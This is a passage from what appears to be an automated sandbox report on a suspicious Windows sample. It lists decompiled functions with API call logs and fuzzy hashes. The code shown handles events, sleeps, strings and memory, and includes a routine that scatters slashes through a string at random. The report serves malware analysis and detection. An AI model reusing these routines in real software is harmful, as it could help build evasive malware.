						_t28 =  *0x11da120( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E011D6BE1(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E011D51A8(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x011d73c4
0x011d73cb
0x011d73d5
0x011d73d9
0x011d73df
0x011d73ec
0x011d73f3
0x011d73f7
0x011d7409
0x011d740b
0x011d740b
0x011d7410
0x011d7417
0x011d7422
0x011d7438
0x011d743c
0x011d743e
0x011d7443
0x011d7443
0x011d7450
0x011d7454
0x011d7458
0x00000000
0x00000000
0x011d7466
0x011d746a
0x00000000
0x00000000
0x011d746a
0x011d7454
0x00000000
0x011d746c
0x011d746c
0x011d746c
0x011d7472
0x011d7474
0x011d7474
0x011d747e
0x011d7482
0x011d7494
0x011d7494
0x011d7498
0x011d749e
0x011d749e
0x011d74a1
0x011d74a3
0x011d74a6
0x011d74a6
0x011d74ad
0x011d74b3
0x011d74b3

APIs

Part of subcall function 011D2DEA: lstrlen.KERNEL32(E8FA7DD7,00000000,00000000,00000027,00000000,00000000,011D7909,011D55DE,?,00000000,E8FA7DD7,00000000,?,?,?,011D55DE), ref: 011D2E20
Part of subcall function 011D2DEA: lstrcpy.KERNEL32(00000000,00000000), ref: 011D2E44
Part of subcall function 011D2DEA: lstrcat.KERNEL32(00000000,00000000), ref: 011D2E4C

CreateEventA.KERNEL32(011DA2F8,00000001,00000000,00000000,2B8B8603,00000001,00000000,?,?,00000000,?,011D30E1,?,?,?), ref: 011D7402

Part of subcall function 011D50CA: HeapFree.KERNEL32(00000000,00000000,011D4239,00000000,00000001,?,00000000,?,?,?,011D6B8D,00000000,?,00000001), ref: 011D50D6

WaitForSingleObject.KERNEL32(00000000,00004E20,011D30E1,00000000,?,00000000,?,011D30E1,?,?,?,?,?,?,?,011D211B), ref: 011D7460
WaitForSingleObject.KERNEL32(00000000,00004E20,2B8B8603,00000001,00000000,?,?,00000000,?,011D30E1,?,?,?), ref: 011D748E
CloseHandle.KERNEL32(00000000,2B8B8603,00000001,00000000,?,?,00000000,?,011D30E1,?,?,?), ref: 011D74A6

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: d5b49e98a1ca61274b2dd4c6c0ca8779504732b8fcfc224058091be54b70639b
Instruction ID: 93fd3f4739426dc87e22a2706cd52b0161e196586baedf6c8dd9981da652731b
Opcode Fuzzy Hash: d5b49e98a1ca61274b2dd4c6c0ca8779504732b8fcfc224058091be54b70639b
Instruction Fuzzy Hash: E021D3326023226BE73B6BACAC44B5B7EE9AF4476DF154225FE519B2C5DB70D8408780

Uniqueness

Uniqueness Score: -1.00%

Function 011D3032, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E011D3032(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E011D6710(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E011D15B9(_t23);
						}
					}
					return _t38;
				}
				if(E011D4C8C(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x11da2f8, 1, 0,  *0x11da394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E011D4039(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E011D1D57(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E011D3C84(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E011D73C3( &_v32, _t39);
					goto L13;
				}
			}

0x011d3032
0x011d303f
0x011d3045
0x011d3046
0x011d3047
0x011d3048
0x011d3049
0x011d304d
0x011d3059
0x011d305d
0x011d30e5
0x011d30e5
0x011d30e8
0x011d30ea
0x011d30f2
0x011d30f8
0x011d30fb
0x011d30fb
0x011d30f8
0x011d3106
0x011d3106
0x011d3070
0x011d3072
0x011d3072
0x011d3089
0x011d308d
0x011d3090
0x011d309b
0x011d30a2
0x011d30a2
0x011d30ae
0x011d30af
0x011d30bd
0x011d30b1
0x011d30b1
0x011d30b2
0x011d30b3
0x011d30b4
0x011d30b5
0x011d30b6
0x011d30b6
0x011d30c2
0x011d30c7
0x011d30c9
0x011d30cb
0x011d30cb
0x011d30d2
0x00000000
0x011d30d4
0x011d30d4
0x011d30e1
0x00000000
0x011d30e1

APIs

CreateEventA.KERNEL32(011DA2F8,00000001,00000000,00000040,?,?,74B5F710,00000000,74B5F730,?,?,?,?,011D211B,?,00000001), ref: 011D3083
SetEvent.KERNEL32(00000000,?,?,?,?,011D211B,?,00000001,011D560C,00000002,?,?,011D560C), ref: 011D3090
Sleep.KERNEL32(00000BB8,?,?,?,?,011D211B,?,00000001,011D560C,00000002,?,?,011D560C), ref: 011D309B
CloseHandle.KERNEL32(00000000,?,?,?,?,011D211B,?,00000001,011D560C,00000002,?,?,011D560C), ref: 011D30A2

Part of subcall function 011D4039: WaitForSingleObject.KERNEL32(00000000,?,?,?,011D30C2,?,011D30C2,?,?,?,?,?,011D30C2,?), ref: 011D4113

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: 99839c6176dfe1d9ead6057ff198a84d60782c530b20454da3c1d88de58132b6
Instruction ID: d4a807869669ee6e1826886e44fe394a961d32d1f4d34591fb4f27c64b14db25
Opcode Fuzzy Hash: 99839c6176dfe1d9ead6057ff198a84d60782c530b20454da3c1d88de58132b6
Instruction Fuzzy Hash: 0721AAB290111AABDB28AFE9D8849EEB77DBF04254B054425EA21A7100DB35D9458BA2

Uniqueness

Uniqueness Score: -1.00%

Function 011D4D09, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E011D4D09(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E011D6837(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x011d4d15
0x011d4d19
0x011d4d1a
0x011d4d1b
0x011d4d1d
0x011d4d1f
0x011d4d24
0x011d4d27
0x011d4dbe
0x011d4dc5
0x011d4dc5
0x011d4d30
0x011d4d37
0x011d4d47
0x011d4d47
0x011d4d4d
0x011d4d4f
0x011d4d54
0x011d4d5d
0x011d4d65
0x011d4d68
0x011d4d73
0x011d4d77
0x011d4d79
0x011d4d7a
0x011d4d83
0x011d4d87
0x011d4d98
0x011d4d89
0x011d4d8e
0x011d4d93
0x011d4da2
0x011d4da2
0x011d4d77
0x011d4da8
0x011d4dae
0x011d4dae
0x011d4db7
0x011d4dbc
0x011d4dbc
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 011D4D37
lstrlenW.KERNEL32(?), ref: 011D4D6D
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 011D4D8E
SysFreeString.OLEAUT32(?), ref: 011D4DA2

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 44224716659af1037dfca1fe04aae5e7e46f34ec0f35de68c8b4025c52e34767
Instruction ID: dcef86ab06fe2cef6547ef2467c04e9800538d776e996871a747e0cf84ee328e
Opcode Fuzzy Hash: 44224716659af1037dfca1fe04aae5e7e46f34ec0f35de68c8b4025c52e34767
Instruction Fuzzy Hash: 94218075A01619FFCB14DFA8D884DDEBBB9FF58305B204169E945E7610E730DA40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 011D52E5, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E011D52E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x11da290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x11da2a8; // 0x0
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x11da2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x011d52ed
0x011d52f0
0x011d52f6
0x011d530e
0x011d5312
0x011d5315
0x011d5317
0x011d531a
0x011d531c
0x011d531f
0x011d5321
0x011d5321
0x011d5323
0x011d532e
0x011d5333
0x011d5344
0x011d534c
0x011d5351
0x011d5354
0x011d5357
0x011d5359
0x011d535f
0x011d5362
0x011d5362
0x011d5362
0x011d536d
0x011d5372
0x011d537c

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,011D62E0,00000000,?,00000000,011D70D9,00000000,00000000), ref: 011D52F0
RtlAllocateHeap.NTDLL(00000000,?), ref: 011D5308
memcpy.NTDLL(00000000,00000000,-00000008,?,?,?,011D62E0,00000000,?,00000000,011D70D9,00000000,00000000), ref: 011D534C
memcpy.NTDLL(00000001,00000000,00000001,011D70D9,00000000,00000000), ref: 011D536D

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 72687077f7f9a0c8697af102e6a960ec85f5366445708355ab35acc002b5e8bf
Instruction ID: 0cf1e736340c5b57ab1c3d75fd65d80e4aef4c42c938e93ab83acfc7ef3c52a6
Opcode Fuzzy Hash: 72687077f7f9a0c8697af102e6a960ec85f5366445708355ab35acc002b5e8bf
Instruction Fuzzy Hash: 1A110672A05218BFC728CB69EC84E9EBBBEEB80290B040276F50497150EB749E40C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 011D5076, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E011D5076() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x11da2c4; // 0x238
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x11da308; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x11da2c4; // 0x238
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x11da290; // 0x3bd0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x011d5076
0x011d507d
0x011d50c7
0x011d50c9
0x011d50c9
0x011d5081
0x011d5087
0x011d508c
0x011d5090
0x011d5096
0x011d509d
0x00000000
0x00000000
0x011d509f
0x011d50a4
0x00000000
0x00000000
0x00000000
0x011d50a4
0x011d50a6
0x011d50ae
0x011d50b1
0x011d50b1
0x011d50b7
0x011d50be
0x011d50c1
0x011d50c1
0x00000000

APIs

SetEvent.KERNEL32(00000238,00000001,011D56C9), ref: 011D5081
SleepEx.KERNEL32(00000064,00000001), ref: 011D5090
CloseHandle.KERNEL32(00000238), ref: 011D50B1
HeapDestroy.KERNEL32(03BD0000), ref: 011D50C1

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 07b2bdeb29337ce9a0791a5a87fe8299244afb94cebd8ea7efae36a7e31eed3a
Instruction ID: 6083ceba8614b97ef2bd85b4ed8ea6b993278f3e0c89a9fea7e4c4702937f163
Opcode Fuzzy Hash: 07b2bdeb29337ce9a0791a5a87fe8299244afb94cebd8ea7efae36a7e31eed3a
Instruction Fuzzy Hash: 7DF0C071B033259BEB78AF79B84CB563BBDAF04B51B040564BD65D7188DF35D4808B90

Uniqueness

Uniqueness Score: -1.00%

Function 011D10DD, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E011D10DD(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x11da37c; // 0x0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x11da37c; // 0x0
					if( *((intOrPtr*)(_t6 + 0x58)) == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x11da030) {
					HeapFree( *0x11da290, 0, _t8);
				}
				_t14[1] = E011D578C(_v0);
				_t11 =  *0x11da37c; // 0x0
				_t12 = _t11 + 0x40;
				__imp__(_t12, _t14);
				return _t12;
			}

0x011d10dd
0x011d10dd
0x011d10e6
0x011d10f6
0x011d10f6
0x011d1100
0x00000000
0x00000000
0x011d10f0
0x011d10f0
0x011d1102
0x011d1106
0x011d1118
0x011d1118
0x011d1128
0x011d112b
0x011d1130
0x011d1134
0x011d113a

APIs

RtlEnterCriticalSection.NTDLL(-00000040), ref: 011D10E6
Sleep.KERNEL32(0000000A,?,?,011D55D3,?,?,?,?,?,011D6BD8,?,00000001), ref: 011D10F0
HeapFree.KERNEL32(00000000,?,?,?,011D55D3,?,?,?,?,?,011D6BD8,?,00000001), ref: 011D1118
RtlLeaveCriticalSection.NTDLL(-00000040), ref: 011D1134

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 51abf1e8b44e52c93e8e8bc9aee8c946bc4ab2fdec6d912ba03bce4c774c82f4
Instruction ID: cf52ff64ea1b014cb6719cde0929e0ade8b66d6019b192d2f0d919de0d837418
Opcode Fuzzy Hash: 51abf1e8b44e52c93e8e8bc9aee8c946bc4ab2fdec6d912ba03bce4c774c82f4
Instruction Fuzzy Hash: 1BF03470307244BBEB3DEB78F949A0A7BA9AF04744B048020FA65D7259CB20E880CB25

Uniqueness

Uniqueness Score: -1.00%

Function 011D50DF, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E011D50DF() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x11da37c; // 0x0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x11da37c; // 0x0
					if(_t5[0x16] == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x11da37c; // 0x0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x11db83e) {
					HeapFree( *0x11da290, 0, _t10);
					_t7 =  *0x11da37c; // 0x0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x011d50df
0x011d50e8
0x011d50f8
0x011d50f8
0x011d5102
0x00000000
0x00000000
0x011d50f2
0x011d50f2
0x011d5104
0x011d5109
0x011d510d
0x011d5120
0x011d5126
0x011d5126
0x011d512f
0x011d5131
0x011d5135
0x011d513b

APIs

RtlEnterCriticalSection.NTDLL(-00000040), ref: 011D50E8
Sleep.KERNEL32(0000000A,?,?,011D55D3,?,?,?,?,?,011D6BD8,?,00000001), ref: 011D50F2
HeapFree.KERNEL32(00000000,?,?,?,011D55D3,?,?,?,?,?,011D6BD8,?,00000001), ref: 011D5120
RtlLeaveCriticalSection.NTDLL(-00000040), ref: 011D5135

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 6316fa85ec686c55f24489053f8093c714c1d849402503912a1ab8baec82aadf
Instruction ID: 963e68a783175fdd9ef731d68bf5a5e6ddf26ddebac3f66af45582c2a5f231fe
Opcode Fuzzy Hash: 6316fa85ec686c55f24489053f8093c714c1d849402503912a1ab8baec82aadf
Instruction Fuzzy Hash: 8EF0FEB4247200EFEB2CDF28F899F153BB6AF08745B058025E926D7358CB74A880CB25

Uniqueness

Uniqueness Score: -1.00%

Function 011205D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMTD ref: 01120644
_ValidateRead.LIBCMTD ref: 01120659

Strings

csm, xrefs: 011205D9

Memory Dump Source

Source File: 00000000.00000002.479054596.00000000010EE000.00000020.00020000.sdmp, Offset: 010EE000, based on PE: false

Similarity

API ID: ReadValidate__encode_pointer
String ID: csm
API String ID: 977738414-1018135373
Opcode ID: 50a3d047e5566543f74ad40468a5e96932403381b3cf00460a6d44afeb8de55a
Instruction ID: 88bb8f79387ad52e6ae6604651d5afb66e2bafade725619c97f48c07f5a96b5a
Opcode Fuzzy Hash: 50a3d047e5566543f74ad40468a5e96932403381b3cf00460a6d44afeb8de55a
Instruction Fuzzy Hash: DC119D75A00215DFDB2CCF68E44496A7BB5AF98204F6042A8F9494F351DB31EEA1CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 011D3D98, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E011D3D98(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E011D6837(_t2);
				if(_t34 != 0) {
					_t30 = E011D6837(_t28);
					if(_t30 == 0) {
						E011D50CA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E011D77DD(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E011D77DD(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x011d3d98
0x011d3da2
0x011d3da4
0x011d3daa
0x011d3daa
0x011d3db3
0x011d3db7
0x011d3dc3
0x011d3dc7
0x011d3e3b
0x011d3dc9
0x011d3dc9
0x011d3dcd
0x011d3dd4
0x011d3dd7
0x011d3df1
0x011d3de0
0x011d3de0
0x011d3de4
0x011d3de7
0x011d3dec
0x011d3dec
0x011d3df6
0x011d3e1e
0x011d3e24
0x011d3e27
0x011d3df8
0x011d3dfa
0x011d3e02
0x011d3e0d
0x011d3e12
0x011d3e12
0x011d3e2e
0x011d3e35
0x011d3e36
0x011d3e36
0x011d3dc7
0x011d3e46

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,011D3CEE,00000000,00000000,00000000,00000000,?,?,011D106E,?,00000000), ref: 011D3DA4

Part of subcall function 011D6837: RtlAllocateHeap.NTDLL(00000000,00000000,011D4197), ref: 011D6843

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,011D3CEE,00000000,00000000,00000000,00000000,?,?,011D106E), ref: 011D3E02
lstrcpy.KERNEL32(00000000,00000000), ref: 011D3E12
lstrcpy.KERNEL32(00000000,00000000), ref: 011D3E1E

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 48042cbbd9b41df80e833f0ef5d2e06bd763c55ffe3a8292958024cb0210792d
Instruction ID: 43e457fd5b5a81efc0be9e910d5ca61d68580cb647757b9f016247ffb4edf62a
Opcode Fuzzy Hash: 48042cbbd9b41df80e833f0ef5d2e06bd763c55ffe3a8292958024cb0210792d
Instruction Fuzzy Hash: 9A21D6B2500256FFCB1A5F68C884AAF7FBDEF15248B058065FD149B201D734D941C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 011D5D37, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E011D5D37(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E011D6837(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x011d5d4c
0x011d5d50
0x011d5d5a
0x011d5d61
0x011d5d64
0x011d5d66
0x011d5d6e
0x011d5d73
0x011d5d81
0x011d5d86
0x011d5d90

APIs

lstrlenW.KERNEL32(2738C7B8,?,74B05520,00000008,011DBD54,?,011D1B37,2738C7B8,011DBD54,?,?,?,?,?,?,011D20B0), ref: 011D5D47
lstrlenW.KERNEL32(011D1B37,?,011D1B37,2738C7B8,011DBD54,?,?,?,?,?,?,011D20B0), ref: 011D5D4E

Part of subcall function 011D6837: RtlAllocateHeap.NTDLL(00000000,00000000,011D4197), ref: 011D6843

memcpy.NTDLL(00000000,2738C7B8,74B069A0,?,?,011D1B37,2738C7B8,011DBD54,?,?,?,?,?,?,011D20B0), ref: 011D5D6E
memcpy.NTDLL(74B069A0,011D1B37,00000002,00000000,2738C7B8,74B069A0,?,?,011D1B37,2738C7B8,011DBD54), ref: 011D5D81

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 5a02f350ed7ea2959059c8519ba383105e727938c888fee17503671bf1b4bd11
Instruction ID: baa00b3cb8a341ee55c4665d6400d3fcae4ce3812e89056b12aba8aa66dd853f
Opcode Fuzzy Hash: 5a02f350ed7ea2959059c8519ba383105e727938c888fee17503671bf1b4bd11
Instruction Fuzzy Hash: FAF03776900119BB8F14EFA8CC84C8E7BACEE082987114162AA08D7201E735EA14CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 011D21C1, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,011D7100,00000000), ref: 011D21D1
lstrlen.KERNEL32(?), ref: 011D21D9

Part of subcall function 011D6837: RtlAllocateHeap.NTDLL(00000000,00000000,011D4197), ref: 011D6843

lstrcpy.KERNEL32(00000000,00000000), ref: 011D21ED
lstrcat.KERNEL32(00000000,?), ref: 011D21F8

